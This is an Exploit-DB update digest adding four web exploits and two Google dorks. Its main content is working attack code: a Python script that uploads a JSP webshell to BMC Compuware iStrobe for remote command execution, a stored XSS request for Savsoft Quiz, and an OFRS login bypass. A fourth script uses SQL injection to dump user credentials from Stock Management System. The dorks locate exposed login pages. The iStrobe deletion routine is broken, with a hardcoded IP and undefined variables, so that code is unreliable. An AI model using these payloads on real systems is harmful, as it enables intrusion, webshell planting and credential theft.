DB: 2024-04-14

6 changes to exploits/shellcodes/ghdb

BMC Compuware iStrobe Web - 20.13 - Pre-auth RCE

Online Fire Reporting System OFRS  - SQL Injection Authentication Bypass

Savsoft Quiz v6.0 Enterprise - Stored XSS

Stock Management System v1.0 - Unauthenticated SQL Injection

exploits/jsp/webapps/51991.py

@@ -0,0 +1,74 @@
+#!/usr/bin/env python3
+
+# Exploit Title: Pre-auth RCE on Compuware iStrobe Web
+# Date: 01-08-2023
+# Exploit Author: trancap
+# Vendor Homepage: https://www.bmc.com/
+# Version: BMC Compuware iStrobe Web - 20.13
+# Tested on: zOS# CVE : CVE-2023-40304
+# To exploit this vulnerability you'll need "Guest access" enabled. The vulnerability is quite simple and impacts a web upload form, allowing a path traversal and an arbitrary file upload (.jsp files)
+# The vulnerable parameter of the form is "fileName". Using the form, one can upload a webshell (content of the webshell in the "topicText" parameter).# I contacted the vendor but he didn't consider this a vulnerability because of the Guest access needed.
+
+import requests
+import urllib.parse
+import argparse
+import sys
+
+def upload_web_shell(url):
+  data = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"open","topicText":"<%@
+page import=\"java.lang.*,java.io.*,java.util.*\" %><%Process
+p=Runtime.getRuntime().exec(request.getParameter(\"cmd\"));BufferedReader
+stdInput = new BufferedReader(new
+InputStreamReader(p.getInputStream()));BufferedReader stdError = new
+BufferedReader(new InputStreamReader(p.getErrorStream()));String
+s=\"\";while((s=stdInput.readLine()) !=
+null){out.println(s);};s=\"\";while((s=stdError.readLine()) !=
+null){out.println(s);};%>","lang":"en","type":"MODULE","status":"PUB"}
+  # If encoded, the web shell will not be uploaded properly
+  data = urllib.parse.urlencode(data, safe='"*<>,=()/;{}!')
+
+  # Checking if web shell already uploaded
+  r = requests.get(f"{url}/istrobe/jsp/userhelp/ws.jsp", verify=False)
+  if r.status_code != 404:
+    return
+
+  r = requests.post(f"{url}/istrobe/userHelp/saveUserHelp", data=data,
+verify=False)
+
+  if r.status_code == 200:
+    print(f"[+] Successfully uploaded web shell, it should be
+accessible at {url}/istrobe/jsp/userhelp/ws.jsp")
+  else:
+    sys.exit("[-] Something went wrong while uploading the web shell")
+
+def delete_web_shell(url):
+  paramsPost = {"fileName":"../jsp/userhelp/ws.jsp","author":"Guest","name":"test","action":"delete","lang":"en","type":"MODULE","status":"PUB"}
+  response = session.post("http://220.4.147.38:6301/istrobe/userHelp/deleteUserHelp",
+data=paramsPost, headers=headers, cookies=cookies)
+
+  if r.status_code == 200:
+    print(f"[+] Successfully deleted web shell")
+  else:
+    sys.exit("[-] Something went wrong while deleting the web shell")
+
+def run_cmd(url, cmd):
+  data = f"cmd={cmd}"
+  r = requests.post(f"{url}/istrobe/jsp/userhelp/ws.jsp", data=data,
+verify=False)
+
+  if r.status_code == 200:
+    print(r.text)
+  else:
+    sys.exit(f'[-] Something went wrong while executing "{cmd}" command')
+
+parser = argparse.ArgumentParser(prog='exploit_cve_2023_40304.py', description='CVE-2023-40304 - Pre-auth file upload vulnerability + path traversal to achieve RCE')
+parser.add_argument('url', help='Vulnerable URL to target. Must be like http(s)://vuln.target')
+parser.add_argument('-c', '--cmd', help='Command to execute on the remote host (Defaults to "whoami")', default='whoami')
+parser.add_argument('--rm', help='Deletes the uploaded web shell', action='store_true')
+args = parser.parse_args()
+
+upload_web_shell(args.url)
+run_cmd(args.url, args.cmd)
+
+if args.rm:
+  delete_web_shell(args.url)

exploits/php/webapps/51988.txt

@@ -0,0 +1,48 @@
+# Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site
+Scripting
+# Date: 2024-01-03
+# Exploit Author: Eren Sen
+# Vendor: SAVSOFT QUIZ
+# Vendor Homepage: https://savsoftquiz.com
+# Software Link: https://savsoftquiz.com/web/index.php/online-demo/
+# Version: < 6.0
+# CVE-ID: N/A
+# Tested on: Kali Linux / Windows 10
+# Vulnerabilities Discovered Date : 2024/01/03
+
+# Persistent Cross Site Scripting (XSS) Vulnerability
+# Vulnerable Parameter Type: POST
+# Vulnerable Parameter: quiz_name
+
+# Proof of Concepts:
+
+https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13
+
+# HTTP Request:
+
+POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1
+Host: demos1.softaculous.com
+Cookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxx
+Content-Length: 411
+Cache-Control: max-age=0
+Sec-Ch-Ua:
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: https://demos1.softaculous.com
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer:
+https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_new
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+quiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=

exploits/php/webapps/51989.txt

@@ -0,0 +1,131 @@
+# Exploit Title: Online Fire Reporting System SQL Injection Authentication Bypass
+# Date: 02/10/2024
+# Exploit Author: Diyar Saadi
+# Vendor Homepage: https://phpgurukul.com/online-fire-reporting-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/projects/Online-Fire-Reporting-System-using-PHP.zip
+# Version: V 1.2
+# Tested on: Windows 11 + XAMPP 8.0.30
+
+## Exploit Description ##
+
+SQL Injection Vulnerability in ofrs/admin/index.php :
+The SQL injection vulnerability in the ofrs/admin/index.php script arises from insecure handling of user input during the login process.
+
+## Steps to reproduce ##
+
+1- Open the admin panel page by following URL : http://localhost/ofrs/admin/index.php
+2- Enter the following payload from username-box : admin'or'1--
+3- Press Login button or press Enter .
+
+## Proof Of Concept [1] ##
+
+POST /ofrs/admin/index.php HTTP/1.1
+Host: localhost
+Content-Length: 46
+Cache-Control: max-age=0
+sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/ofrs/admin/index.php
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=fmnj70mh1qo2ssv80mlsv50o29
+Connection: close
+
+username=admin%27or%27--&inputpwd=&login=login
+
+## Proof Of Concept [ Python Based Script ] [2] ##
+
+import os
+import requests
+from selenium import webdriver
+from selenium.webdriver.common.by import By
+from selenium.webdriver.support.ui import WebDriverWait
+from selenium.webdriver.support import expected_conditions as EC
+import pyautogui
+
+
+banner = """
+
+
+
+
+
+
+
+
+░█████╗░███████╗██████╗░░██████╗  ░█████╗░███╗░░░███╗░██████╗
+██╔══██╗██╔════╝██╔══██╗██╔════╝  ██╔══██╗████╗░████║██╔════╝
+██║░░██║█████╗░░██████╔╝╚█████╗░  ██║░░╚═╝██╔████╔██║╚█████╗░
+██║░░██║██╔══╝░░██╔══██╗░╚═══██╗  ██║░░██╗██║╚██╔╝██║░╚═══██╗
+╚█████╔╝██║░░░░░██║░░██║██████╔╝  ╚█████╔╝██║░╚═╝░██║██████╔╝
+░╚════╝░╚═╝░░░░░╚═╝░░╚═╝╚═════╝░  ░╚════╝░╚═╝░░░░░╚═╝╚═════╝░
+# Code By : Diyar Saadi
+
+
+
+
+
+
+
+                                                                        """
+
+print(banner)
+
+payload_requests = input("Enter the payload: ")
+
+url_requests = "http://localhost/ofrs/admin/index.php"
+data = {
+    'username': payload_requests,
+    'password': 'password',
+    'login': 'Login'
+}
+headers = {
+    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
+    'Content-Type': 'application/x-www-form-urlencoded',
+    'Custom-Header': 'Your-Custom-Value'
+}
+
+try:
+    response = requests.post(url_requests, data=data, headers=headers, allow_redirects=False)
+
+    if response.status_code == 302 and response.headers.get('Location') and 'dashboard.php' in response.headers['Location']:
+        print("Requests version: Admin Panel Successfully Bypassed !")
+
+        url_selenium = "http://localhost/ofrs/admin/index.php"
+
+        chrome_driver_path = "C:\\Windows\\webdriver\\chromedriver.exe"
+
+        chrome_options = webdriver.ChromeOptions()
+        chrome_options.add_argument("executable_path=" + chrome_driver_path)
+
+        driver = webdriver.Chrome(options=chrome_options)
+        driver.get(url_selenium)
+
+        pyautogui.typewrite(payload_requests)
+        pyautogui.press('tab')
+        pyautogui.typewrite(payload_requests)
+
+        pyautogui.press('enter')
+
+        WebDriverWait(driver, 10).until(EC.url_contains("dashboard.php"))
+
+        screenshot_path = os.path.join(os.getcwd(), "dashboard_screenshot.png")
+        driver.save_screenshot(screenshot_path)
+        print(f"Selenium version: Screenshot saved as {screenshot_path}")
+
+        driver.quit()
+
+    else:
+        print("Requests version: Login failed.")
+except Exception as e:
+    print(f"An error occurred: {e}")

exploits/php/webapps/51990.py

@@ -0,0 +1,55 @@
+# Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection
+# Date: February 6, 2024
+# Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group
+# Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip
+# Tested on: Linux and Windows, XAMPP
+# CVE-2023-51951
+# Vendor: oretnom23
+# Version: v1.0
+# Exploit Description:
+#   The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the SQL database using an Error-Based Injection attack.
+
+import requests
+from bs4 import BeautifulSoup
+import argparse
+
+def print_header():
+    print("\033[1m\nStock Management System v1.0\033[0m")
+    print("\033[1mSQL Injection Exploit\033[0m")
+    print("\033[96mby blu3ming\n\033[0m")
+
+def parse_response(target_url):
+    try:
+        target_response = requests.get(target_url)
+        soup = BeautifulSoup(target_response.text, 'html.parser')
+        textarea_text = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'}).text
+
+        # Split the text using ',' as a delimiter
+        users = textarea_text.split(',')
+        for user in users:
+            # Split username and password using ':' as a delimiter
+            username, password = user.split(':')
+            print("| {:<20} | {:<40} |".format(username, password))
+    except:
+        print("No data could be retrieved. Try again.")
+
+def retrieve_data(base_url):
+    target_path = '/sms/admin/?page=purchase_order/manage_po&id='
+    payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-"
+
+    #Dump users table
+    target_url = base_url + target_path + payload
+    print("+----------------------+------------------------------------------+")
+    print("| {:<20} | {:<40} |".format("username", "password"))
+    print("+----------------------+------------------------------------------+")
+    parse_response(target_url)
+    print("+----------------------+------------------------------------------+\n")
+
+if __name__ == "__main__":
+    about  = 'Unauthenticated SQL Injection Exploit - Stock Management System'
+    parser = argparse.ArgumentParser(description=about)
+    parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL')
+    args = parser.parse_args()
+    print_header()
+    retrieve_data(args.base_url)

files_exploits.csv

@@ -5748,6 +5748,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25739,exploits/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 - Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",webapps,jsp,,2005-05-27,2013-05-27,1,,,,,,https://www.securityfocus.com/bid/13794/info
 25738,exploits/jsp/webapps/25738.txt,"BEA WebLogic 7.0/8.1 - Administration Console LoginForm.jsp Cross-Site Scripting",2005-05-27,"Team SHATTER",webapps,jsp,,2005-05-27,2013-05-27,1,,,,,,https://www.securityfocus.com/bid/13793/info
 26778,exploits/jsp/webapps/26778.txt,"BlackBoard Academic Suite 6.2.3.23 - Frameset.jsp Cross-Domain Frameset Loading",2005-12-12,dr_insane,webapps,jsp,,2005-12-12,2013-07-12,1,CVE-2005-4206;OSVDB-21618,,,,,https://www.securityfocus.com/bid/15814/info
+51991,exploits/jsp/webapps/51991.py,"BMC Compuware iStrobe Web - 20.13 - Pre-auth RCE",2024-04-13,trancap,webapps,jsp,,2024-04-13,2024-04-13,0,,,,,,
 35707,exploits/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 - Cross-Site Scripting / Information Disclosure",2011-05-05,"Richard Brain",webapps,jsp,,2011-05-05,2015-01-06,1,,,,,,https://www.securityfocus.com/bid/47731/info
 35706,exploits/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 - Default Account / Multiple Cross-Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",webapps,jsp,,2011-05-05,2015-01-06,1,,,,,,https://www.securityfocus.com/bid/47728/info
 37260,exploits/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",webapps,jsp,8080,2015-06-10,2016-10-10,1,CVE-2015-3898;CVE-2015-3897;OSVDB-122082;OSVDB-122081,,,,,https://www.htbridge.com/advisory/HTB23259
@@ -24933,6 +24934,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5889,exploits/php/webapps/5889.txt,"Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,2016-12-09,1,OSVDB-46485;CVE-2008-2890;OSVDB-46484;OSVDB-46483,,,,http://www.exploit-db.comoffl-0.2.6.zip,
 4374,exploits/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 - Remote File Inclusion",2007-09-07,MhZ91,webapps,php,,2007-09-06,2016-10-12,1,OSVDB-36944;CVE-2007-4809;OSVDB-36943,,,,http://www.exploit-db.comoffl-0.2.6.zip,
 48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php,,2020-07-15,2020-07-15,0,,,,,,
+51989,exploits/php/webapps/51989.txt,"Online Fire Reporting System OFRS  - SQL Injection Authentication Bypass",2024-04-13,"Diyar Saadi",webapps,php,,2024-04-13,2024-04-13,0,,,,,,
 41029,exploits/php/webapps/41029.txt,"Online Food Delivery 2.04 - Authentication Bypass",2017-01-12,"Dawid Morawski",webapps,php,,2017-01-12,2017-01-12,0,,,,,,
 48827,exploits/php/webapps/48827.txt,"Online Food Ordering System 1.0 - Remote Code Execution",2020-09-23,"Eren Şimşek",webapps,php,,2020-09-23,2020-09-23,0,,,,,,
 50305,exploits/php/webapps/50305.py,"Online Food Ordering System 2.0 -  Remote Code Execution (RCE) (Unauthenticated)",2021-09-20,"Abdullah Khawaja",webapps,php,,2021-09-20,2021-09-20,0,,,,,,
@@ -29249,6 +29251,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48658,exploits/php/webapps/48658.txt,"Savsoft Quiz 5 - Persistent Cross-Site Scripting",2020-07-09,th3d1gger,webapps,php,,2020-07-09,2020-07-09,0,,,,,,
 48753,exploits/php/webapps/48753.txt,"Savsoft Quiz 5 - Stored Cross-Site Scripting",2020-08-18,"Mayur Parmar",webapps,php,,2020-08-18,2020-08-26,0,CVE-2020-24609,,,,,
 48785,exploits/php/webapps/48785.txt,"Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting",2020-09-03,"Hemant Patidar",webapps,php,,2020-09-03,2020-12-03,0,CVE-2020-24609,,,,,
+51988,exploits/php/webapps/51988.txt,"Savsoft Quiz v6.0 Enterprise - Stored XSS",2024-04-13,"Eren Sen",webapps,php,,2024-04-13,2024-04-13,0,,,,,,
 30719,exploits/php/webapps/30719.txt,"Saxon 5.4 - 'Example.php' SQL Injection",2007-10-29,netVigilance,webapps,php,,2007-10-29,2014-01-06,1,CVE-2007-4863;OSVDB-38839,,,,,https://www.securityfocus.com/bid/26238/info
 30718,exploits/php/webapps/30718.txt,"Saxon 5.4 - 'Menu.php' Cross-Site Scripting",2007-10-29,netVigilance,webapps,php,,2007-10-29,2014-01-06,1,CVE-2007-4862;OSVDB-38287,,,,,https://www.securityfocus.com/bid/26237/info
 2718,exploits/php/webapps/2718.txt,"SazCart 1.5 - 'cart.php' Remote File Inclusion",2006-11-04,IbnuSina,webapps,php,,2006-11-03,2016-11-28,1,OSVDB-30194;CVE-2006-5727,,,,,
@@ -30386,6 +30389,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49994,exploits/php/webapps/49994.txt,"Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)",2021-06-14,"Riadh Benlamine",webapps,php,,2021-06-14,2021-06-14,0,,,,,,
 48733,exploits/php/webapps/48733.txt,"Stock Management System 1.0 - Authentication Bypass",2020-08-05,"Adeeb Shah",webapps,php,,2020-08-05,2020-08-05,0,,,,,,
 48783,exploits/php/webapps/48783.txt,"Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)",2020-09-02,boku,webapps,php,,2020-09-02,2020-09-02,0,,,,,,
+51990,exploits/php/webapps/51990.py,"Stock Management System v1.0 - Unauthenticated SQL Injection",2024-04-13,blu3ming,webapps,php,,2024-04-13,2024-04-13,0,,,,,,
 42768,exploits/php/webapps/42768.pl,"Stock Photo Selling 1.0 - SQL Injection",2017-09-22,"Ihsan Sencan",webapps,php,,2017-09-22,2017-09-22,0,,,,,,
 50348,exploits/php/webapps/50348.py,"Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-09-29,Ghuliev,webapps,php,,2021-09-29,2021-09-29,0,,,,,,
 13813,exploits/php/webapps/13813.html,"Store Locator - Cross-Site Request Forgery (Add Admin)",2010-06-10,JaMbA,webapps,php,,2010-06-09,,1,,,,,,

ghdb.xml

@@ -116386,6 +116386,26 @@ PsyDel</textualDescription>
   <date>2024-02-06</date>
   <author>Thomas Heverin</author>
  </entry>
+ <entry>
+  <id>8426</id>
+  <link>https://www.exploit-db.com/ghdb/8426</link>
+  <category>Vulnerable Servers</category>
+  <shortDescription>allintitle:&quot;ITRS OP5 Monitor&quot;</shortDescription>
+  <textualDescription>Dear Off Sec Team,
+
+Here is a new Google Dork:
+
+#GoogleDork  allintitle:&quot;ITRS OP5 Monitor&quot;
+#Description login pages for network monitoring devices
+#Author *Girls Learn Cyber*
+#Date 4/12/2024
+</textualDescription>
+  <query>allintitle:&quot;ITRS OP5 Monitor&quot;</query>
+  <querystring>https://www.google.com/search?q=allintitle:&quot;ITRS OP5 Monitor&quot;</querystring>
+  <edb></edb>
+  <date>2024-04-13</date>
+  <author>Thomas Heverin</author>
+ </entry>
  <entry>
   <id>388</id>
   <link>https://www.exploit-db.com/ghdb/388</link>
@@ -116885,6 +116905,22 @@ Ingeniero Civil en Inform<72>tica.</textualDescription>
   <date>2012-05-15</date>
   <author>anonymous</author>
  </entry>
+ <entry>
+  <id>8425</id>
+  <link>https://www.exploit-db.com/ghdb/8425</link>
+  <category>Vulnerable Servers</category>
+  <shortDescription>intitle:&quot;FileCatalyst file transfer solution&quot;</shortDescription>
+  <textualDescription># Google Dork: intitle:&quot;FileCatalyst file transfer solution&quot;
+# Files Containing Juicy Info
+# Date: 19/03/2024
+# Exploit Kamran Saifullah
+</textualDescription>
+  <query>intitle:&quot;FileCatalyst file transfer solution&quot;</query>
+  <querystring>https://www.google.com/search?q=intitle:&quot;FileCatalyst file transfer solution&quot;</querystring>
+  <edb></edb>
+  <date>2024-04-13</date>
+  <author>Kamran Saifullah</author>
+ </entry>
  <entry>
   <id>192</id>
   <link>https://www.exploit-db.com/ghdb/192</link>